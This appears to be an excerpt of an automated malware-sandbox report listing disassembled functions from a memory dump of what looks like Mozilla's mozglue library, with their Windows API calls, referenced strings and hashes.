                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4ed904c31e5ccff24c3afeed701832b83aa3b77642202fe48db01c04e5eda96a
                                                                  • Instruction ID: f1ba4c0fee3de21cb139933d6edcc1986f5b798622d51cddd8783df55e58ea64
                                                                  • Opcode Fuzzy Hash: 4ed904c31e5ccff24c3afeed701832b83aa3b77642202fe48db01c04e5eda96a
                                                                  • Instruction Fuzzy Hash: 95A15CB0A00745CFDB28CF29C994A99FBF5BF49304F44866ED44997B40D730A955CF92
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6CA114C5
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CA114E2
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6CA11546
                                                                  • InitializeConditionVariable.KERNEL32(?), ref: 6CA115BA
                                                                  • free.MOZGLUE(?), ref: 6CA116B4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                  • String ID:
                                                                  • API String ID: 1909280232-0
                                                                  • Opcode ID: dc04847bdf2bead443305c1b40f81ff0672189f2420548b12ec2c17866f4212f
                                                                  • Instruction ID: 2f85fd07155977bdaced8a0307c39f9f0a9c77f9fd4c91187edb3c542236d48d
                                                                  • Opcode Fuzzy Hash: dc04847bdf2bead443305c1b40f81ff0672189f2420548b12ec2c17866f4212f
                                                                  • Instruction Fuzzy Hash: F061F375A047009BDB218F24D880BEE77B5BF99308F04851CEE8A57B01DB35E989CB91
                                                                  APIs
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CA09FDB
                                                                  • free.MOZGLUE(?,?), ref: 6CA09FF0
                                                                  • free.MOZGLUE(?,?), ref: 6CA0A006
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CA0A0BE
                                                                  • free.MOZGLUE(?,?), ref: 6CA0A0D5
                                                                  • free.MOZGLUE(?,?), ref: 6CA0A0EB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                  • String ID:
                                                                  • API String ID: 956590011-0
                                                                  • Opcode ID: 714541ae9983c2b6a9725fc2f67a66405d06576e72719014d8e917aca64769a1
                                                                  • Instruction ID: caf233b3b6fe3a5d5797d50922318abb36f979c5285b1564b0b4a3bbc35eadd0
                                                                  • Opcode Fuzzy Hash: 714541ae9983c2b6a9725fc2f67a66405d06576e72719014d8e917aca64769a1
                                                                  • Instruction Fuzzy Hash: 9461E2759087069FC711CF18C48059AB3F5FF98369F148659EC999B702EB32E986CBC1
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6CA0DC60
                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,?,6CA0D38A,?), ref: 6CA0DC6F
                                                                  • free.MOZGLUE(?,?,?,?,?,6CA0D38A,?), ref: 6CA0DCC1
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6CA0D38A,?), ref: 6CA0DCE9
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6CA0D38A,?), ref: 6CA0DD05
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6CA0D38A,?), ref: 6CA0DD4A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                  • String ID:
                                                                  • API String ID: 1842996449-0
                                                                  • Opcode ID: 31497593320b6dde22b977e2ca626dc278d5717a98de35c4054d6a39cca737cb
                                                                  • Instruction ID: aa474d6a40d4336b580ee8f491afda7790c7803af1f7252bc6530b098061c804
                                                                  • Opcode Fuzzy Hash: 31497593320b6dde22b977e2ca626dc278d5717a98de35c4054d6a39cca737cb
                                                                  • Instruction Fuzzy Hash: 8C4157B6B006068FCB00CFA9E88099AB7B6FF88358B654569D905ABB11D731FC44CB90
                                                                  APIs
                                                                    • Part of subcall function 6C9EFA80: GetCurrentThreadId.KERNEL32 ref: 6C9EFA8D
                                                                    • Part of subcall function 6C9EFA80: AcquireSRWLockExclusive.KERNEL32(6CA3F448), ref: 6C9EFA99
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C9F6727
                                                                  • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C9F67C8
                                                                    • Part of subcall function 6CA04290: memcpy.VCRUNTIME140(?,?,6CA12003,6CA10AD9,?,6CA10AD9,00000000,?,6CA10AD9,?,00000004,?,6CA11A62,?,6CA12003,?), ref: 6CA042C4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                  • String ID: data
                                                                  • API String ID: 511789754-2918445923
                                                                  • Opcode ID: 70dc367f8dceaf0fefa05e6d750f75c6675c81919f41b453f19b0c8b6aed235f
                                                                  • Instruction ID: 78a80cd0ef248ef56f48822e0f33cf45c6222d61978caf6950184b0646cffe72
                                                                  • Opcode Fuzzy Hash: 70dc367f8dceaf0fefa05e6d750f75c6675c81919f41b453f19b0c8b6aed235f
                                                                  • Instruction Fuzzy Hash: CDD1DE71A083408FD724DF28D850B9EB7E5AFE5308F14892DE599C7B51EB30E84ACB52
                                                                  APIs
                                                                  • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6CA0C82D
                                                                  • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6CA0C842
                                                                    • Part of subcall function 6CA0CAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6CA2B5EB,00000000), ref: 6CA0CB12
                                                                  • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6CA0C863
                                                                  • std::_Facet_Register.LIBCPMT ref: 6CA0C875
                                                                    • Part of subcall function 6C9EB13D: ??_U@YAPAXI@Z.MOZGLUE(00000008,?,?,6CA2B636,?), ref: 6C9EB143
                                                                  • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6CA0C89A
                                                                  • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CA0C8BC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
                                                                  • String ID:
                                                                  • API String ID: 2745304114-0
                                                                  • Opcode ID: b04e962a42be8cf1582ae0ef8aaec86eb64cd7eeacbb90a61fa27e314f48633e
                                                                  • Instruction ID: cf1fe7dd751022b8e89fbcb23075b0e808e1e4060b1c822a7bcc617556432fa4
                                                                  • Opcode Fuzzy Hash: b04e962a42be8cf1582ae0ef8aaec86eb64cd7eeacbb90a61fa27e314f48633e
                                                                  • Instruction Fuzzy Hash: 4711E971B0030A8BCF05DFA4EC998AEBB75FF89398B044129D50AD7341DB30990ACBA1
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C9BEB57,?,?,?,?,?,?,?,?,?), ref: 6C9ED652
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C9BEB57,?), ref: 6C9ED660
                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C9BEB57,?), ref: 6C9ED673
                                                                  • free.MOZGLUE(?), ref: 6C9ED888
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: free$memsetmoz_xmalloc
                                                                  • String ID: |Enabled
                                                                  • API String ID: 4142949111-2633303760
                                                                  • Opcode ID: 4fe064e00073a6201c6f1162bd8730c139f22849fea459bd52fd143e5d9485e7
                                                                  • Instruction ID: 0082c57e9f9c2e63b9a1f9f495c1a7b6630acc66d49bb34d592f8582b2805487
                                                                  • Opcode Fuzzy Hash: 4fe064e00073a6201c6f1162bd8730c139f22849fea459bd52fd143e5d9485e7
                                                                  • Instruction Fuzzy Hash: ECA125B1A003458FDB16CF69C8907AEBBF4AFAD318F14805CD889AB741C735E845CBA1
                                                                  APIs
                                                                  • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C9EF480
                                                                    • Part of subcall function 6C9BF100: LoadLibraryW.KERNEL32(shell32,?,6CA2D020), ref: 6C9BF122
                                                                    • Part of subcall function 6C9BF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C9BF132
                                                                  • CloseHandle.KERNEL32(00000000), ref: 6C9EF555
                                                                    • Part of subcall function 6C9C14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C9C1248,6C9C1248,?), ref: 6C9C14C9
                                                                    • Part of subcall function 6C9C14B0: memcpy.VCRUNTIME140(?,6C9C1248,00000000,?,6C9C1248,?), ref: 6C9C14EF
                                                                    • Part of subcall function 6C9BEEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C9BEEE3
                                                                  • CreateFileW.KERNEL32 ref: 6C9EF4FD
                                                                  • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C9EF523
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                  • String ID: \oleacc.dll
                                                                  • API String ID: 2595878907-3839883404
                                                                  • Opcode ID: c8a773a28993a2cd62f420d34c5c6bfbbf7293fc2b75d6696b55b1d8661ca3a5
                                                                  • Instruction ID: 860ffc750f0f9c1d273c54d4faf8cc7524d5c7ad80198c57d0be42e88af50319
                                                                  • Opcode Fuzzy Hash: c8a773a28993a2cd62f420d34c5c6bfbbf7293fc2b75d6696b55b1d8661ca3a5
                                                                  • Instruction Fuzzy Hash: 9F41E4306087119FD321CF28D844AABB3F4AFA831CF104A1DF595C3690EB30D949CB92
                                                                  APIs
                                                                  • SetLastError.KERNEL32(00000000), ref: 6CA17526
                                                                  • __Init_thread_footer.LIBCMT ref: 6CA17566
                                                                  • __Init_thread_footer.LIBCMT ref: 6CA17597
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Init_thread_footer$ErrorLast
                                                                  • String ID: UnmapViewOfFile2$kernel32.dll
                                                                  • API String ID: 3217676052-1401603581
                                                                  • Opcode ID: 38db264b6d67efdf03325859410984d6d35a19b986ad4084265b42df6a2075fd
                                                                  • Instruction ID: 97aaa9adb133548d9233400540475e2008a6191968641ab41aa524c89aadcd07
                                                                  • Opcode Fuzzy Hash: 38db264b6d67efdf03325859410984d6d35a19b986ad4084265b42df6a2075fd
                                                                  • Instruction Fuzzy Hash: 82213D31704612ABCB289FA9DC28E953775FB56334B08915DE80DD7F40CB31E88385A5
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6CA3F770,-00000001,?,6CA2E330,?,6C9DBDF7), ref: 6CA1A7AF
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6C9DBDF7), ref: 6CA1A7C2
                                                                  • moz_xmalloc.MOZGLUE(00000018,?,6C9DBDF7), ref: 6CA1A7E4
                                                                  • LeaveCriticalSection.KERNEL32(6CA3F770), ref: 6CA1A80A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
                                                                  • String ID: accelerator.dll
                                                                  • API String ID: 2442272132-2426294810
                                                                  • Opcode ID: a04043a705d0e940c42654dfa8d6f386c59a9f9898502a76c132e8784c271794
                                                                  • Instruction ID: f43de2f49a6707292065a68f98caf9e8502ce32cb2b3de0b6f3b85d015534f7c
                                                                  • Opcode Fuzzy Hash: a04043a705d0e940c42654dfa8d6f386c59a9f9898502a76c132e8784c271794
                                                                  • Instruction Fuzzy Hash: F9017C716143049F9B08CF59DC9882177B9FB8931570880AAE809CB751DB709D49CBA1
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(ole32,?,6C9BEE51,?), ref: 6C9BF0B2
                                                                  • GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6C9BF0C2
                                                                  Strings
                                                                  • Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6C9BF0DC
                                                                  • Could not find CoTaskMemFree, xrefs: 6C9BF0E3
                                                                  • ole32, xrefs: 6C9BF0AD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
                                                                  • API String ID: 2574300362-1578401391
                                                                  • Opcode ID: 2e21f6cfbf8154349044da4b56179cb07622f105d5cfa0043f841365a29d4dc3
                                                                  • Instruction ID: 0aca27d55f4f69e14c05c20a0aaac313bebcba002ccd5b7ea2cbad80b9b654f3
                                                                  • Opcode Fuzzy Hash: 2e21f6cfbf8154349044da4b56179cb07622f105d5cfa0043f841365a29d4dc3
                                                                  • Instruction Fuzzy Hash: 7DE0927D748713EF9F185AA66C2862777BD6B5210D310C12DE50AE1E50EB30D0518625
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(wintrust.dll,?,6C9C7204), ref: 6C9F0088
                                                                  • GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6C9F00A7
                                                                  • FreeLibrary.KERNEL32(?,6C9C7204), ref: 6C9F00BE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadProc
                                                                  • String ID: CryptCATAdminAcquireContext2$wintrust.dll
                                                                  • API String ID: 145871493-3385133079
                                                                  • Opcode ID: 52e0c5d6cde590850ef47cd6419cb1e225f75b48e74ac911c6b9d2a441161c31
                                                                  • Instruction ID: 841bf33eebb9a8fa7f4979ca33457dcbc5569cb44990fd8519750c59128f21cf
                                                                  • Opcode Fuzzy Hash: 52e0c5d6cde590850ef47cd6419cb1e225f75b48e74ac911c6b9d2a441161c31
                                                                  • Instruction Fuzzy Hash: 4DE0E5B02107029BDB2CAB699C2C7013AFDA70B344F14D159ED2CC2690D774C046CB11
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(wintrust.dll,?,6C9C7235), ref: 6C9F00D8
                                                                  • GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6C9F00F7
                                                                  • FreeLibrary.KERNEL32(?,6C9C7235), ref: 6C9F010E
                                                                  Strings
                                                                  • wintrust.dll, xrefs: 6C9F00D3
                                                                  • CryptCATAdminCalcHashFromFileHandle2, xrefs: 6C9F00F1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadProc
                                                                  • String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
                                                                  • API String ID: 145871493-2559046807
                                                                  • Opcode ID: 876b957afa5aa230b90e5b0b6368991178ecc37d06cde998a11fda974d45ebda
                                                                  • Instruction ID: 9c33aba46523b446dd7e1086b5af4b50900e99182b1183653e5acf3aa79661a3
                                                                  • Opcode Fuzzy Hash: 876b957afa5aa230b90e5b0b6368991178ecc37d06cde998a11fda974d45ebda
                                                                  • Instruction Fuzzy Hash: 61E01A703193079BEF2C9F699E2DB223AFDA702244F20D459ED1DC1680D770C0528B10
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(ntdll.dll,?,6CA1C0E9), ref: 6CA1C418
                                                                  • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6CA1C437
                                                                  • FreeLibrary.KERNEL32(?,6CA1C0E9), ref: 6CA1C44C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadProc
                                                                  • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                  • API String ID: 145871493-2623246514
                                                                  • Opcode ID: 309004157db3af60b2fb69b84fee36a7b915c7249feb3eaf6bf18f755f2fbcbd
                                                                  • Instruction ID: 078b81ba39e761c2257632cb71cd53fcf096f8aa984e122dc55c8d4b57e1a587
                                                                  • Opcode Fuzzy Hash: 309004157db3af60b2fb69b84fee36a7b915c7249feb3eaf6bf18f755f2fbcbd
                                                                  • Instruction Fuzzy Hash: 39E01A702183129BDB2C6B759D2CB013AF8B706208F14C269AE0CC1690DB74C0468A10
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(ntdll.dll,?,6CA1748B,?), ref: 6CA175B8
                                                                  • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6CA175D7
                                                                  • FreeLibrary.KERNEL32(?,6CA1748B,?), ref: 6CA175EC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadProc
                                                                  • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                  • API String ID: 145871493-3641475894
                                                                  • Opcode ID: 425f0d5b2b7fd04d1fbc51496fed3a62a224a68cd7d244587b83b674afdc4645
                                                                  • Instruction ID: 7835b3faa81f1069bc33153762edb0b20e7279df90191195f63302b4c2141c7c
                                                                  • Opcode Fuzzy Hash: 425f0d5b2b7fd04d1fbc51496fed3a62a224a68cd7d244587b83b674afdc4645
                                                                  • Instruction Fuzzy Hash: 87E01A71314303ABEB285FA5DD6C7013AF8EB02214F20D06ABD0CE1A80DB7480838F50
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(ntdll.dll,?,6CA17592), ref: 6CA17608
                                                                  • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6CA17627
                                                                  • FreeLibrary.KERNEL32(?,6CA17592), ref: 6CA1763C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadProc
